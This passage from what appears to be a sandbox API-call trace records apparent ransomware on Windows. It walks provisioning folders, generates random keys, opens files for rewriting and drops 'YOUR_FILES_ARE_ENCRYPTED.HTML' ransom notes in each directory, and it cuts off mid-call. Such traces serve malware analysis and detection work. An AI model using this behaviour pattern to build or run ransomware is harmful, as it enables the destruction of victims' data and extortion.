pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml") returned 100 [0107.035] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0107.035] lstrlenW (lpString=".xml") returned 4 [0107.035] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0107.035] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0107.035] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0107.035] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=271) returned 1 [0107.035] CloseHandle (hObject=0x31c) returned 1 [0107.036] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd6b510c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="Prov", cAlternateFileName="")) returned 1 [0107.036] StrStrIW (lpFirst="Prov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.036] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov") returned 85 [0107.036] GetProcessHeap () returned 0x600000 [0107.036] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0107.036] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov" [0107.036] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\*" [0107.036] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd6b510c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0107.037] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd6b510c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0107.037] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd6b510c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime", cAlternateFileName="")) returned 1 [0107.037] StrStrIW (lpFirst="RunTime", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.037] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime") returned 93 [0107.037] GetProcessHeap () returned 0x600000 [0107.037] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0107.038] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime" [0107.038] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\*" [0107.038] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd6b510c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName=".", cAlternateFileName="")) returned 0x626978 [0107.039] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd6b510c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="..", cAlternateFileName="")) returned 1 [0107.039] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa12d8e21, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa12d8e21, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa12ff08c, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x71a, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1 [0107.039] StrStrIW (lpFirst="Power_0.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.039] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_0.provxml") returned 109 [0107.039] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0107.039] lstrlenW (lpString=".provxml") returned 8 [0107.039] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0107.039] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa13252fc, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa13252fc, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa13252fc, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x710, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1 [0107.039] StrStrIW (lpFirst="Power_1.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.039] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_1.provxml") returned 109 [0107.039] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0107.039] lstrlenW (lpString=".provxml") returned 8 [0107.039] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0107.039] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa13252fc, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa13252fc, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa13252fc, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x710, dwReserved0=0x318ff28, dwReserved1=0x600284, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 0 [0107.039] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0107.039] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0107.039] GetProcessHeap () returned 0x600000 [0107.039] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315c020 [0107.040] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0107.042] WriteFile (in: hFile=0x314, lpBuffer=0x315c020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x315c020*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0107.042] CloseHandle (hObject=0x314) returned 1 [0107.043] GetProcessHeap () returned 0x600000 [0107.043] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315c020 | out: hHeap=0x600000) returned 1 [0107.043] GetProcessHeap () returned 0x600000 [0107.043] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0107.044] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa12ff08c, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa12ff08c, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa134b56b, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x139, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0107.044] StrStrIW (lpFirst="RunTime.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.044] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml") returned 97 [0107.044] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0107.044] lstrlenW (lpString=".xml") returned 4 [0107.044] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0107.044] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0107.044] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x314 [0107.045] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=313) returned 1 [0107.045] CloseHandle (hObject=0x314) returned 1 [0107.045] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa12ff08c, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa12ff08c, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa134b56b, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x139, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime.xml", cAlternateFileName="")) returned 0 [0107.045] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0107.045] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0107.045] GetProcessHeap () returned 0x600000 [0107.045] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0107.045] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0107.045] WriteFile (in: hFile=0x31c, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0107.046] CloseHandle (hObject=0x31c) returned 1 [0107.047] GetProcessHeap () returned 0x600000 [0107.047] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0107.047] GetProcessHeap () returned 0x600000 [0107.047] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0107.047] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd6b510c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="Prov", cAlternateFileName="")) returned 0 [0107.047] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0107.048] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 110 [0107.048] GetProcessHeap () returned 0x600000 [0107.048] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ee9d8 [0107.048] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0107.048] WriteFile (in: hFile=0x308, lpBuffer=0x6ee9d8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ee9d8*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0107.049] CloseHandle (hObject=0x308) returned 1 [0107.050] GetProcessHeap () returned 0x600000 [0107.050] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ee9d8 | out: hHeap=0x600000) returned 1 [0107.050] GetProcessHeap () returned 0x600000 [0107.050] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.051] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}", cAlternateFileName="{B0B91~1")) returned 1 [0107.051] StrStrIW (lpFirst="{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.051] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}") returned 80 [0107.051] GetProcessHeap () returned 0x600000 [0107.051] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0107.052] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}" [0107.052] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*" [0107.052] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName=".", cAlternateFileName="")) returned 0x626838 [0107.055] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd0268ef, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd0268ef, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd0268ef, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 1 [0107.058] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0d7b677, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0d7b677, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0da18e6, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x8a0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1 [0107.058] StrStrIW (lpFirst="customizations.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.058] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml") returned 99 [0107.058] PathFindExtensionW (pszPath="customizations.xml") returned=".xml" [0107.058] lstrlenW (lpString=".xml") returned 4 [0107.058] PathFindExtensionW (pszPath="customizations.xml") returned=".xml" [0107.058] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0107.059] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0107.063] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=2208) returned 1 [0107.063] GetProcessHeap () returned 0x600000 [0107.063] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b47b0 [0107.065] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="5D") returned 2 [0107.065] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="E9") returned 2 [0107.065] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="14") returned 2 [0107.065] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="BB") returned 2 [0107.065] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="C4") returned 2 [0107.065] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="F8") returned 2 [0107.065] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="58") returned 2 [0107.065] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="BA") returned 2 [0107.065] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="40") returned 2 [0107.065] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="E2") returned 2 [0107.065] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="68") returned 2 [0107.066] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="DB") returned 2 [0107.066] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="EE") returned 2 [0107.066] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="D7") returned 2 [0107.066] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="32") returned 2 [0107.066] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="6C") returned 2 [0107.066] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="1E") returned 2 [0107.066] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="EF") returned 2 [0107.066] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="B7") returned 2 [0107.066] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="4F") returned 2 [0107.066] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="7C") returned 2 [0107.066] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="E0") returned 2 [0107.066] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="73") returned 2 [0107.066] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="68") returned 2 [0107.066] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="7F") returned 2 [0107.066] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="B8") returned 2 [0107.066] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="76") returned 2 [0107.066] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="50") returned 2 [0107.066] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="3A") returned 2 [0107.066] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="91") returned 2 [0107.066] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="6C") returned 2 [0107.066] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="48") returned 2 [0107.067] lstrcpyW (in: lpString1=0x6c4864, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\customizations.xml" | out: 